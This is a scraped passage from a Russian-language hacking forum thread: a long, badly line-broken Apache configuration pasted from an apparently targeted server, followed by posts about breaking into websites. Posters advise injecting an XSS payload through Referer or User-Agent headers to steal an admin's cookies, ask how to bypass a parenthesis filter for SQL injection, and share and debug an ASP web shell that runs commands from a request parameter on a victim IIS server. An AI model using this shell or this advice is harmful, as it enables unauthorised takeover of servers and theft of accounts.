/xslt+xml xslt
    AddType application
/xspf+xml xspf
    AddType application
/xv+xml mxml
    AddType application
/xv+xml xhvml
    AddType application
/xv+xml xvm
    AddType application
/xv+xml xvml
    AddType application
/zip zip
    AddType audio
/basic au
    AddType audio
/basic snd
    AddType audio
/midi kar
    AddType audio
/midi mid
    AddType audio
/midi midi
    AddType audio
/midi rmi
    AddType audio
/mp4 mp4a
    AddType audio
/mp4a-latm m4a
    AddType audio
/mp4a-latm m4p
    AddType audio
/mpeg m2a
    AddType audio
/mpeg m3a
    AddType audio
/mpeg mp2
    AddType audio
/mpeg mp2a
    AddType audio
/mpeg mp3
    AddType audio
/mpeg mpga
    AddType audio
/vnd.digital-winds eol
    AddType audio
/vnd.lucent.voice lvp
    AddType audio
/vnd.nuera.ecelp4800 ecelp4800
    AddType audio
/vnd.nuera.ecelp7470 ecelp7470
    AddType audio
/vnd.nuera.ecelp9600 ecelp9600
    AddType audio
/wav wav
    AddType audio
/x-aiff aif
    AddType audio
/x-aiff aifc
    AddType audio
/x-aiff aiff
    AddType audio
/x-m4a m4a
    AddType audio
/x-mpegurl m3u
    AddType audio
/x-ms-wax wax
    AddType audio
/x-ms-wma wma
    AddType audio
/x-pn-realaudio ra
    AddType audio
/x-pn-realaudio ram
    AddType audio
/x-pn-realaudio rm
    AddType audio
/x-pn-realaudio-plugin rmp
    AddType audio
/x-scpls pls
    AddType audio
/x-wav wav
    AddType chemical
/x-cdx cdx
    AddType chemical
/x-cif cif
    AddType chemical
/x-cmdf cmdf
    AddType chemical
/x-cml cml
    AddType chemical
/x-csml csml
    AddType chemical
/x-pdb pdb
    AddType chemical
/x-xyz xyz
    AddType image
/bmp bmp
    AddType image
/cgm cgm
    AddType image
/g3fax g3
    AddType image
/gif gif
    AddType image
/ief ief
    AddType image
/jp2 jp2
    AddType image
/jpeg jpe
    AddType image
/jpeg jpeg
    AddType image
/pict pct
    AddType image
/pict pic
    AddType image
/pict pict
    AddType image
/png png
    AddType image
/prs.btif btif
    AddType image
/svg+xml svg
    AddType image
/svg+xml svgz
    AddType image
/tiff tif
    AddType image
/tiff tiff
    AddType image
/vnd.adobe.photoshop psd
    AddType image
/vnd.djvu djv
    AddType image
/vnd.djvu djvu
    AddType image
/vnd.dwg dwg
    AddType image
/vnd.dxf dxf
    AddType image
/vnd.fastbidsheet fbs
    AddType image
/vnd.fpx fpx
    AddType image
/vnd.fst fst
    AddType image
/vnd.fujixerox.edmics-mmr mmr
    AddType image
/vnd.fujixerox.edmics-rlc rlc
    AddType image
/vnd.microsoft.icon ico
    AddType image
/vnd.ms-modi mdi
    AddType image
/vnd.net-fpx npx
    AddType image
/vnd.wap.wbmp wbmp
    AddType image
/vnd.xiff xif
    AddType image
/x-cmu-raster ras
    AddType image
/x-cmx cmx
    AddType image
/x-macpaint mac
    AddType image
/x-macpaint pnt
    AddType image
/x-macpaint pntg
    AddType image
/x-pcx pcx
    AddType image
/x-pict pct
    AddType image
/x-pict pic
    AddType image
/x-portable-anymap pnm
    AddType image
/x-portable-bitmap pbm
    AddType image
/x-portable-graymap pgm
    AddType image
/x-portable-pixmap ppm
    AddType image
/x-quicktime qti
    AddType image
/x-quicktime qtif
    AddType image
/x-rgb rgb
    AddType image
/x-xbitmap xbm
    AddType image
/x-xpixmap xpm
    AddType image
/x-xwindowdump xwd
    AddType message
/rfc822 eml
    AddType message
/rfc822 mime
    AddType model
/iges iges
    AddType model
/iges igs
    AddType model
/mesh mesh
    AddType model
/mesh msh
    AddType model
/mesh silo
    AddType model
/vnd.dwf dwf
    AddType model
/vnd.gdl gdl
    AddType model
/vnd.gtw gtw
    AddType model
/vnd.mts mts
    AddType model
/vnd.vtu vtu
    AddType model
/vrml vrml
    AddType model
/vrml wrl
    AddType text
/calendar ics
    AddType text
/calendar ifb
    AddType text
/css css
    AddType text
/csv csv
    AddType text
/html htm
    AddType text
/html html
    AddType text
/html shtml
    AddType text
/plain asc
    AddType text
/plain conf
    AddType text
/plain def
    AddType text
/plain in
    AddType text
/plain list
    
AddType text/plain log
    AddType text
/plain text
    AddType text
/plain txt
    AddType text
/prs.lines.tag dsc
    AddType text
/richtext rtx
    AddType text
/rtf rtf
    AddType text
/sgml sgm
    AddType text
/sgml sgml
    AddType text
/tab-separated-values tsv
    AddType text
/troff man
    AddType text
/troff me
    AddType text
/troff ms
    AddType text
/troff roff
    AddType text
/troff t
    AddType text
/troff tr
    AddType text
/uri-list uri
    AddType text
/uri-list uris
    AddType text
/uri-list urls
    AddType text
/vnd.fly fly
    AddType text
/vnd.fmi.flexstor flx
    AddType text
/vnd.in3d.3dml 3dml
    AddType text
/vnd.in3d.spot spot
    AddType text
/vnd.sun.j2me.app-descriptor jad
    AddType text
/vnd.wap.wml wml
    AddType text
/vnd.wap.wmlscript wmls
    AddType text
/x-asm s
    AddType text
/x-asm sm
    AddType text
/x-c c
    AddType text
/x-c cc
    AddType text
/x-c cpp
    AddType text
/x-c cxx
    AddType text
/x-c dic
    AddType text
/x-c h
    AddType text
/x-c hh
    AddType text
/x-fortran f
    AddType text
/x-fortran f77
    AddType text
/x-fortran f90
    AddType text
/x-fortran for
    
AddType text/x-java-source java
    AddType text
/x-pascal p
    AddType text
/x-pascal pas
    AddType text
/x-setext etx
    AddType text
/x-uuencode uu
    AddType text
/x-vcalendar vcs
    AddType text
/x-vcard vcf
    AddType video
/3gp2 3gp2
    AddType video
/3gpp 3gp
    AddType video
/3gpp 3gpp
    AddType video
/3gpp2 3g2
    AddType video
/h261 h261
    AddType video
/h263 h263
    AddType video
/h264 h264
    AddType video
/jpeg jpgv
    AddType video
/jpm jpgm
    AddType video
/jpm jpm
    AddType video
/mj2 mj2
    AddType video
/mj2 mjp2
    AddType video
/mp4 m4v
    AddType video
/mp4 mp4
    AddType video
/mp4 mp4v
    AddType video
/mp4 mpg4
    AddType video
/mpeg m1v
    AddType video
/mpeg m2v
    AddType video
/mpeg mpe
    AddType video
/mpeg mpeg
    AddType video
/mpeg mpg
    AddType video
/quicktime mov
    AddType video
/quicktime qt
    AddType video
/vnd.fvt fvt
    AddType video
/vnd.mpegurl m4u
    AddType video
/vnd.mpegurl mxu
    AddType video
/vnd.vivo viv
    AddType video
/x-dv dif
    AddType video
/x-dv dv
    AddType video
/x-fli fli
    AddType video
/x-ms-asf asf
    AddType video
/x-ms-asf asx
    AddType video
/x-ms-wm wm
    AddType video
/x-ms-wmv wmv
    AddType video
/x-ms-wmx wmx
    AddType video
/x-ms-wvx wvx
    AddType video
/x-msvideo avi
    AddType video
/x-sgi-movie movie
    AddType x
-conference/x-cooltalk ice
#
# Settings for hosting different languages.
#
# Required modules: mod_mime, mod_negotiation

# DefaultLanguage and AddLanguage allows you to specify the language of 
# a document. You can then use content negotiation to give a browser a 
# file in a language the user can understand.
#
# Specify a default language. This means that all data
# going out without a specific language tag (see below) will 
# be marked with this one. You probably do NOT want to set
# this unless you are sure it is correct for all cases.
#
# * It is generally better to not mark a page as 
# * being a certain language than marking it with the wrong
# * language!
#
# DefaultLanguage nl
#
# Note 1: The suffix does not have to be the same as the language
# keyword --- those with documents in Polish (whose net-standard
# language code is pl) may wish to use "AddLanguage pl .po" to
# avoid the ambiguity with the common suffix for perl scripts.
#
# Note 2: The example entries below illustrate that in some cases 
# the two character 'Language' abbreviation is not identical to 
# the two character 'Country' code for its country,
# E.g. 'Danmark/dk' versus 'Danish/da'.
#
# Note 3: In the case of 'ltz' we violate the RFC by using a three char
# specifier. There is 'work in progress' to fix this and get
# the reference data for rfc1766 cleaned up.
#
# Catalan (ca) - Croatian (hr) - Czech (cs) - Danish (da) - Dutch (nl)
# English (en) - Esperanto (eo) - Estonian (et) - French (fr) - German (de)
# Greek-Modern (el) - Hebrew (he) - Italian (it) - Japanese (ja)
# Korean (ko) - Luxembourgeois* (ltz) - Norwegian Nynorsk (nn)
# Norwegian (no) - Polish (pl) - Portugese (pt)
# Brazilian Portuguese (pt-BR) - Russian (ru) - Swedish (sv)
# Simplified Chinese (zh-CN) - Spanish (es) - Traditional Chinese (zh-TW)
#
    
AddLanguage ca .ca
    AddLanguage cs 
.cz .cs
    AddLanguage da 
.dk
    AddLanguage de 
.de
    AddLanguage el 
.el
    AddLanguage en 
.en
    AddLanguage eo 
.eo
    AddLanguage es 
.es
    AddLanguage et 
.et
    AddLanguage fr 
.fr
    AddLanguage he 
.he
    AddLanguage hr 
.hr
    AddLanguage it 
.it
    AddLanguage ja 
.ja
    AddLanguage ko 
.ko
    AddLanguage ltz 
.ltz
    AddLanguage nl 
.nl
    AddLanguage nn 
.nn
    AddLanguage no 
.no
    AddLanguage pl 
.po
    AddLanguage pt 
.pt
    AddLanguage pt
-BR .pt-br
    AddLanguage ru 
.ru
    AddLanguage sv 
.sv
    AddLanguage zh
-CN .zh-cn
    AddLanguage zh
-TW .zh-tw
# LanguagePriority allows you to give precedence to some languages
# in case of a tie during content negotiation.
#
# Just list the languages in decreasing order of preference. We have
# more or less alphabetized them here. You probably want to change this.
#
    
LanguagePriority en ca cs da de el eo es et fr he hr it ja ko ltz nl nn no pl pt pt-BR ru sv zh-CN zh-TW
#
# ForceLanguagePriority allows you to serve a result page rather than
# MULTIPLE CHOICES (Prefer) [in case of a tie] or NOT ACCEPTABLE (Fallback)
# [in case no accepted languages matched the available variants]
#
    
ForceLanguagePriority Prefer Fallback
#
# Commonly used filename extensions to character sets. You probably
# want to avoid clashes with the language extensions, unless you
# are good at carefully testing your setup after each change.
# See http://www.iana.org/assignments/character-sets for the
# official list of charset names and their respective RFCs.
#
    
AddCharset us-ascii.ascii .us-ascii
    AddCharset ISO
-8859-1  .iso8859-1  .latin1
    AddCharset ISO
-8859-2  .iso8859-2  .latin2 .cen
    AddCharset ISO
-8859-3  .iso8859-3  .latin3
    AddCharset ISO
-8859-4  .iso8859-4  .latin4
    AddCharset ISO
-8859-5  .iso8859-5  .cyr .iso-ru
    AddCharset ISO
-8859-6  .iso8859-6  .arb .arabic
    AddCharset ISO
-8859-7  .iso8859-7  .grk .greek
    AddCharset ISO
-8859-8  .iso8859-8  .heb .hebrew
    AddCharset ISO
-8859-9  .iso8859-9  .latin5 .trk
    AddCharset ISO
-8859-10  .iso8859-10  .latin6
    AddCharset ISO
-8859-13  .iso8859-13
    AddCharset ISO
-8859-14  .iso8859-14  .latin8
    AddCharset ISO
-8859-15  .iso8859-15  .latin9
    AddCharset ISO
-8859-16  .iso8859-16  .latin10
    AddCharset ISO
-2022-JP .iso2022-jp .jis
    AddCharset ISO
-2022-KR .iso2022-kr .kis
    AddCharset ISO
-2022-CN .iso2022-cn .cis
    AddCharset Big5
.Big5   .big5 .b5
    AddCharset cn
-Big5 .cn-big5
# For russian, more than one charset is used (depends on client, mostly):
    
AddCharset WINDOWS-1251 .cp-1251   .win-1251
    AddCharset CP866   
.cp866
    AddCharset KOI8  
.koi8
    AddCharset KOI8
-E  .koi8-e
    AddCharset KOI8
-r  .koi8-.koi8-ru
    AddCharset KOI8
-U  .koi8-u
    AddCharset KOI8
-ru .koi8-uk .ua
    AddCharset ISO
-10646-UCS-.ucs2
    AddCharset ISO
-10646-UCS-.ucs4
    AddCharset UTF
-7   .utf7
    AddCharset UTF
-8   .utf8
    AddCharset UTF
-16  .utf16
    AddCharset UTF
-16BE .utf16be
    AddCharset UTF
-16LE .utf16le
    AddCharset UTF
-32  .utf32
    AddCharset UTF
-32BE .utf32be
    AddCharset UTF
-32LE .utf32le
    AddCharset euc
-cn  .euc-cn
    AddCharset euc
-gb  .euc-gb
    AddCharset euc
-jp  .euc-jp
    AddCharset euc
-kr  .euc-kr
#Not sure how euc-tw got in - IANA doesn't list it???
    
AddCharset EUC-TW  .euc-tw
    AddCharset gb2312  
.gb2312 .gb
    AddCharset iso
-10646-ucs-.ucs-.iso-10646-ucs-2
    AddCharset iso
-10646-ucs-.ucs-.iso-10646-ucs-4
    AddCharset shift_jis   
.shift_jis .sjis
</IfModule>
##
## The mod_mime_magic module allows the server to use various hints from the
## contents of the file itself to determine its type.  The MIMEMagicFile
## directive tells the module where the hint definitions are located.
##
<IfModule mod_mime_magic.c>
    
MIMEMagicFile /etc/apache2/magic
</IfModule>
##
## HostnameLookups: Log the names of clients or just their IP addresses
## e.g., www.apache.org (on) or 204.62.129.132 (off).
## The default is off because it'd be overall better for the net if people
## had to knowingly turn this feature on, since enabling it means that
## each client request will result in AT LEAST one lookup request to the
## nameserver.
##
##
HostnameLookups Off
##
## LogLevel: Control the number of messages logged to the error_log.
## Possible values include: debug, info, notice, warn, error, crit,
## alert, emerg.
##
##
LogLevel warn
<IfModule mod_log_config.c>
#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
#
    
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat 
"%h %l %u %t \"%r\" %>s %b" common
    LogFormat 
"%{Referer}i -> %U" referer
    LogFormat 
"%{User-agent}i" agent
    
<IfModule mod_logio.c>
# You need to enable mod_logio.c to use %I and %O
        
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    
</IfModule>
#
# The location and format of the access logfile (Common Logfile Format).
# If you do not define any access logfiles within a <VirtualHost>
# container, they will be logged here.  Contrariwise, if you *do*
# define per-<VirtualHost> access logfiles, transactions will be
# logged therein and *not* in this file.
#
#### For Mac OS X Server:  Server Admin manages CustomLog directives
#### on a virtual host basis.
#
#    CustomLog "/var/log/apache2/access_log" combined
#
# If you prefer a logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.
#
</IfModule>
##
#
## Optionally add a line containing the server version and virtual host
## name to server-generated pages (error documents, FTP directory listings,
## mod_status and mod_info output etc., but not CGI generated documents).
## Set to "EMail" to also include a mailto: link to the ServerAdmin.
## Set to one of:  On | Off | EMail
##
##
ServerSignature On
UseCanonicalName Off
##
## Aliases: Add here as many aliases as you need (with no limit). The format is 
## Alias fakename realname
##
<IfModule mod_alias.c>
#
# Redirect: Allows you to tell clients about documents that used to
# exist in your server's namespace, but do not anymore. The client
# will make a new request for the document at its new location.
# Example:
# Redirect permanent /foo http://www.example.com/bar

#
# Alias: Maps web paths into filesystem paths and is used to
# access content that does not live under the DocumentRoot.
# Example:
# Alias /webpath /full/filesystem/path
#
# If you include a trailing / on /webpath then the server will
# require it to be present in the URL.  You will also likely
# need to provide a <Directory> section to allow access to
# the filesystem path.

#
# ScriptAlias: This controls which directories contain server scripts.
# ScriptAliases are essentially the same as Aliases, except that
# documents in the target directory are treated as applications and
# run by the server when requested rather than as documents sent to the
# client.  The same rules about trailing "/" apply to ScriptAlias
# directives as to Alias.
#
    
ScriptAliasMatch ^/cgi-bin/((?!(?i:webobjects)).*$) "/Library/WebServer/CGI-Executables/$1"
#       ScriptAlias /cgi-bin/ "/Library/WebServer/CGI-Executables/"
#### For Mac OS X Server: Uncomment this line to enable web-based 
#### configuration of mailman:
##
#    Include /etc/apache2/httpd_mailman.conf
    
<IfModule mod_setenvif.c>
        <
IfModule mod_negotiation.c>
# Allow convenient access to Apache manual
            
AliasMatch ^/manual(?:/(?:de|en|es|fr|ja|ko|pt-br|ru))?(/.*)?$ "/Library/WebServer/share/httpd/manual$1"
            
<Directory "/Library/WebServer/share/httpd/manual">
                
Options Indexes
                AllowOverride None
                Order allow
,deny
                Allow from all
                
<Files *.html>
                    
SetHandler type-map
                
</Files>
                
SetEnvIf Request_URI ^/manual/(de|en|es|fr|ja|ko|pt-br|ru)/ prefer-language=$1
                RedirectMatch 301 
^/manual(?:/(de|en|es|fr|ja|ko|pt-br|ru)){2,}(/.*)?$ /manual/$1$2
                LanguagePriority en de es fr ja ko pt
-br ru    ForceLanguagePriority Prefer Fallback
            
</Directory>
        </
IfModule>
    </
IfModule>
</
IfModule>
##
## Directives controlling the display of server-generated directory listings.
##
#### For Mac OS X Server: Note that indexing is further controlled 
#### by the Server Admin application, which adds "Options +/-Indexes
#### in the virtual host scope.
##
<IfModule mod_autoindex.c>
##
## FancyIndexing is whether you want fancy directory indexing or standard
##
##
    
IndexOptions FancyIndexing
##
## AddIcon* directives tell the server which icon to show for different
## files or filename extensions.  These are only displayed for
## FancyIndexed directories.
##
    
AddIconByEncoding (CMP,/icons/compressed.gifx-compress x-gzip
    AddIconByType 
(TXT,/icons/text.giftext/*
    AddIconByType (IMG,/icons/image2.gif) image/*
    AddIconByType (SND,/icons/sound2.gif) audio/*
    AddIconByType (VID,/icons/movie.gif) video/*
    AddIcon /icons/binary.gif .bin .exe
    AddIcon /icons/binhex.gif .hqx
    AddIcon /icons/tar.gif .tar
    AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv
    AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip
    AddIcon /icons/a.gif .ps .ai .eps
    AddIcon /icons/layout.gif .html .shtml .htm .pdf
    AddIcon /icons/text.gif .txt
    AddIcon /icons/c.gif .c
    AddIcon /icons/p.gif .pl .py
    AddIcon /icons/f.gif .for
    AddIcon /icons/dvi.gif .dvi
    AddIcon /icons/uuencoded.gif .uu
    AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl
    AddIcon /icons/tex.gif .tex
    AddIcon /icons/bomb.gif core
    AddIcon /icons/back.gif ..
    AddIcon /icons/hand.right.gif README
    AddIcon /icons/folder.gif ^^DIRECTORY^^
    AddIcon /icons/blank.gif ^^BLANKICON^^
##
## DefaultIcon is which icon to show for files which do not have an icon
## explicitly set.
##
    DefaultIcon /icons/unknown.gif
##
## AddDescription allows you to place a short description after a file in
## server-generated indexes.  These are only displayed for FancyIndexed
## directories.
## Format: AddDescription "description" filename
##
#AddDescription "GZIP compressed document" .gz
#AddDescription "tar archive" .tar
#AddDescription "GZIP compressed tar archive" .tgz
#AddDescription "Mac OS Disk Image file" .dmg

##
## ReadmeName is the name of the README file the server will look for by
## default, and append to directory listings.
##
## HeaderName is the name of a file which should be prepended to
## directory indexes. 
##
## If MultiViews are amongst the Options in effect, the server will
## first look for name.html and include it if found.  If name.html
## doesn't exist, the server will then look for name.txt and include
## it as plaintext if found.
##
    ReadmeName README
    HeaderName HEADER
##
## IndexIgnore is a set of filenames which directory indexing should ignore
## and not include in the listing.  Shell-style wildcarding is permitted.
##
    IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t
</IfModule>
##
## MetaDir: specifies the name of the directory in which Apache can find
## meta information files. These files contain additional HTTP headers
## to include when sending the document
##
#MetaDir .web

##
## MetaSuffix: specifies the file name suffix for the file containing the
## meta information.
##
#MetaSuffix .meta

##

# Customizable error responses come in three flavors:
# 1) plain text 2) local redirects 3) external redirects

# Some examples:
#ErrorDocument 500 "The server made a boo boo."
#ErrorDocument 404 /missing.html
#ErrorDocument 404 "/cgi-bin/missing_handler.pl"
#ErrorDocument 402 http://www.example.com/subscription_info.html
#

# The configuration below implements multi-language error documents through
# content-negotiation, and via the default Alias for /error in the vhost config file.

<Directory "/usr/share/httpd/error">
    AllowOverride None
    Options IncludesNoExec
    AddOutputFilter Includes html
    AddHandler type-map var
    Order allow,deny
    Allow from all
    LanguagePriority en cs de es fr it ja ko nl pl pt-br ro sv tr
    ForceLanguagePriority Prefer Fallback
</Directory>
ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var
ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var
ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var
ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var
ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var
ErrorDocument 410 /error/HTTP_GONE.html.var
ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var
ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var
ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var
ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var
ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var
ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var
ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var
ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var
ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var
ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var
#
# Allow server status reports generated by mod_status,
# with the URL of http://servername/server-status

<IfModule mod_status.c>
    <Location "/server-status">
        SetHandler server-status
        Order deny,allow
        Deny from all
        Allow from 127.0.0.1
    </Location>
#
# ExtendedStatus controls whether Apache will generate "full" status
# information (ExtendedStatus On) or just basic information (ExtendedStatus
# Off) when the "server-status" handler is called. The default is Off.
#
    ExtendedStatus On
</IfModule>
#
# Allow remote server configuration reports, with the URL of
#  http://servername/server-info (requires that mod_info.c be loaded).
#
#<IfModule mod_info.c>
#    <Location /server-info>
#        SetHandler server-info
#        Order deny,allow
#    Deny from all
#    Allow from .your-domain.com
#    </Location>
#</IfModule>

#
## Proxy Server directives. 
#
<IfModule mod_proxy.c>
    ProxyRequests Off
    <IfModule mod_disk_cache.c>
        CacheEnable disk /
        CacheRoot "/var/run/proxy"
    </IfModule>
    <Proxy "disabled_proxy">
        Allow from example.com
        Order Deny,Allow
        Deny from all
    </Proxy>
</IfModule>
##
#### mod_expires is configured so that all static files but images
#### expire after 60 seconds. Any response that has a life span of more
#### than 5 seconds (see webperfcache.conf) will be cached by webperfcache.
#### Make sure your CGIs return a "Cache-Control: no-cache" header if you
#### elect to make your dynamically generated HTML pages not cache-able.
#### If all your HTML pages are static you may also increase ExpiresDefault.

<IfModule mod_expires.c>
    ExpiresActive On
    ExpiresDefault A60
    ExpiresByType image/bmp A3600
    ExpiresByType image/gif A3600
    ExpiresByType image/ief A3600
    ExpiresByType image/jpeg A3600
    ExpiresByType image/png A3600
    ExpiresByType image/tiff A3600
    ExpiresByType image/x-cmu-raster A3600
    ExpiresByType image/x-portable-anymap A3600
    ExpiresByType image/x-portable-bitmap A3600
    ExpiresByType image/x-portable-graymap A3600
    ExpiresByType image/x-portable-pixmap A3600
    ExpiresByType image/x-rgb  A3600
    ExpiresByType image/x-xbitmap A3600
    ExpiresByType image/x-xpixmap A3600
    ExpiresByType image/x-xwindowdump A3600
    ExpiresByType audio/basic A3600
    ExpiresByType audio/midi A3600
    ExpiresByType audio/mpeg A3600
    ExpiresByType audio/x-aiff A3600
    ExpiresByType audio/x-pn-realaudio A3600
    ExpiresByType audio/x-pn-realaudio-plugin A3600
    ExpiresByType audio/x-realaudio A3600
    ExpiresByType audio/x-wav A3600
    ExpiresByType video/mpeg A3600
    ExpiresByType video/quicktime A3600
    ExpiresByType video/x-msvideo A3600
    ExpiresByType video/x-sgi-movie A3600
</IfModule>
##
##

## SSL stuff

<IfModule mod_ssl.c>
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
    SSLPassPhraseDialog exec:/etc/apache2/getsslpassphrase
    SSLSessionCache shmcb:/var/run/ssl_scache(512000)
    SSLSessionCacheTimeout 300
    SSLMutex file:/var/log/apache2/ssl_mutex
    SSLRandomSeed startup builtin
    SSLRandomSeed connect builtin
    AddType application/x-x509-ca-cert crt
    AddType application/x-pkcs7-crl crl
</IfModule>
<IfModule mod_jk.c>
    JKWorkersFile /etc/apache2/workers.properties
    JKLogFile /var/log/apache2/mod_jk.log
    JKLogLevel error
    JKMount /*.jsp JBoss1
    JKMount /servlet/* JBoss1
    JKMount /examples/* JBoss1
</IfModule>
## 
##
## The default server is used for status on a special port
##
#ServerName www.example.com
Listen 127.0.0.1:9010
DocumentRoot "/var/empty"
ErrorLog "/var/log/apache2/error_log"
<Directory "/var/empty">
    Order Deny,Allow
    Deny from All
</Directory>
##
<IfModule mod_auth_digest_apple.c>
    BrowserMatch "MSIE" AuthDigestEnableQueryStringHack=On
</IfModule>
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} ^TRACE
    RewriteRule .* - [F]
</IfModule>
<IfModule mod_headers.c>
    Header add MS-Author-Via "DAV"
    RequestHeader set X_FORWARDED_PROTO 'https' env=https
</IfModule>
<IfModule mod_encoding.c>
    EncodingEngine on
    NormalizeUsername on
    DefaultClientEncoding UTF-8
# Windows XP?
    AddClientEncoding "Microsoft-WebDAV-MiniRedir/" MSUTF-8
# Windows 2K SP2 with .NET
    AddClientEncoding "(Microsoft .* DAV\$)" MSUTF-8
# Windows 2K SP2/Windows XP
    AddClientEncoding "(Microsoft .* DAV 1.1)" CP932
# Windows XP?
    AddClientEncoding "Microsoft-WebDAV*" CP932
# RealPlayer
    AddClientEncoding "RMA/*" CP932
# MacOS X webdavfs
    AddClientEncoding "WebDAVFS" UTF-8
# cadaver
    AddClientEncoding "cadaver/" EUC-JP
</IfModule>
RLimitNPROC max max
ExtendedStatus On
Timeout 300
KeepAlive On
MaxKeepAliveRequests 500
KeepAliveTimeout 15
# As of Mac OS X Server 10.5, the compiled-in server limit is 2048
ServerLimit 2048
# Server Admin manages ListenBackLog as a function of MaxClients: min(511, MaxClients/2)
MaxClients 1024
ListenBackLog 511
# Including WebObjects Configs
Include /System/Library/WebObjects/Adaptors/Apache2.2/apache.conf
####
#### The following Include directive is essential for the virtual hosts to be usable.
####
Include "/etc/apache2/sites/*.conf"
#Include /System/Library/WebObjects/Adaptors/Apache2.2/apache.conf 
mikhailtpm вне форума   Ответить с цитированием
Старый 13.01.2016, 07:36   #3503
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Пых не грузится:
Цитата:
#LoadModule php5_module libexec/apache2/libphp5.so
Есть смысл посмотреть что есть тут:
Цитата:
Include /System/Library/WebObjects/Adaptors/Apache2.2/apache.conf
Include "/etc/apache2/sites/*.conf
403-я ошибка может быть вызвана нехваткой прав у www процесса на файлы создаваемые БД. Чтобы не рисковать единственным шансом, попробуй поднять на виртуалке максимально близкую конфигурацию. И проверить различные варианты.

Последний раз редактировалось crlf; 13.01.2016 в 07:42..
crlf вне форума   Ответить с цитированием
Старый 13.01.2016, 11:49   #3504
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

на cgi нужен чмод, попробуй shtml.
euro вне форума   Ответить с цитированием
Старый 19.01.2016, 13:48   #3505
PowerOfTheMind
 
Регистрация: 19.01.2016
Сообщений: 1
Репутация: 0
По умолчанию

Всем привет.Подскажите что за ошибка и можно ли из нее что выжать?Или она бесполезна?
PowerOfTheMind вне форума   Ответить с цитированием
Старый 19.01.2016, 19:25   #3506
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Цитата:
Сообщение от PowerOfTheMind Посмотреть сообщение
Всем привет.Подскажите что за ошибка и можно ли из нее что выжать?Или она бесполезна?
Ошибка возникает из-за отсутствия заголовка Referer в запросе к скрипту.
Возможна XSS атака на админа, при условии, что лог выводится c Content-Type: text/html и админ его просматривает. Нужно отправить реферер или User-Agent с подготовленной заранее начинкой, которая, либо отправит вам куки админа, либо произведёт определенные действия с его аккаунта.

Последний раз редактировалось crlf; 19.01.2016 в 19:33..
crlf вне форума   Ответить с цитированием
Старый 25.01.2016, 04:46   #3507
spectator
 
Регистрация: 06.07.2010
Сообщений: 1
Репутация: 0
По умолчанию

Имеется sql-иньекция, но запрос блокируется при наличии символов скобок "(" и ")", у кого-нибудь есть идеи как это можно обойти?
spectator вне форума   Ответить с цитированием
Старый 25.01.2016, 08:43   #3508
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от spectator Посмотреть сообщение
Имеется sql-иньекция, но запрос блокируется при наличии символов скобок "(" и ")", у кого-нибудь есть идеи как это можно обойти?
не использовать скобки
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 25.01.2016, 23:18   #3509
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

Такой ступор, не выходит исполнить комманды мини шелла на asp, размер больше 455 символов кода не пропускает записать если что.
PHP код:
<%
Set oScript Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys Server.CreateObject("Scripting.FileSystemObject")

cmd request("cmd")

output ""
If (cmd <> ""Then
  output 
oScript.Exec ("WRITABLE_DIR\RUNCMD_EXE """ cmd """").stdout.readall
End 
If
%>

<
pre><%
If (
output <> ""Then
  Response
.Write output
End 
If
%></
pre


На выводе site.com/shell.asp в исходнике показывает лишь <pre></pre> и все. Как быть? Или подскажите варианты в моей ситуации.
p.s. Сайт крутится на
Windows 2008 R2 or 7
ASP.NET, Microsoft IIS 7.5, ASP
MySQL 5, юзер root, скачка через select load_file что-то не работает, а вот загрузка файлов работает.

E:/inetpub/wwwroot/SLL/ корневой путь сайта

Последний раз редактировалось mikhailtpm; 26.01.2016 в 01:38..
mikhailtpm вне форума   Ответить с цитированием
Старый 26.01.2016, 09:59   #3510
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Цитата:
Сообщение от mikhailtpm Посмотреть сообщение
Set oScript = Server.CreateObject("WSCRIPT.SHELL")

cmd = request("cmd")

output = ""
If (cmd <> "") Then
output = oScript.Exec ("WRITABLE_DIR\RUNCMD_EXE """ & cmd & """").stdout.readall
End If
что за writable_dir, почему оно вообще должно работать?

Dim oShell
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd " & cmd , нет? Или тот же exec
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)
